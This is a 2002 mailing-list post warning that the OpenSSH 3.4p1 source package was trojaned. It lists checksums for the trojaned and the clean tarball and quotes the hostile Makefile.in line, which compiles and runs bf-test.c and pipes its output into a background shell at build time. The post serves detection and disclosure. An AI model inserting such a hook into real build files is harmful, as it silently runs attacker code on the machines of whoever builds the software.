[ale] ! Openssh package trojaned...

Jonathan Rickman jonathan at xcorps.net
Thu Aug 1 09:44:02 EDT 2002


On 1 Aug 2002, cfowler wrote:

> Do we need to do anything to our current installs of this ver?

Follow-up to my earlier post.

MD5 checksum of trojaned package - 3ac9bc346d736b4a51d676faa2a08a57

MD5 checksum on the package I used to build mine

jonathan at abacus:~$ md5sum tmp/openssh-3.4p1.tar.gz

459c1d0262e939d6432f193c7a4ba8a8  tmp/openssh-3.4p1.tar.gz

jonathan at abacus:~$

If you want more piece of mind, extract the tarball and check
./openssh-3.4p1/openbsd-compat/Makefile.in for this:

 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

If it's there, and you have a different MD5 checksum than the one posted
above...please let the rest of us know.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net





---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
sent to listmaster at ale dot org.






More information about the Ale mailing list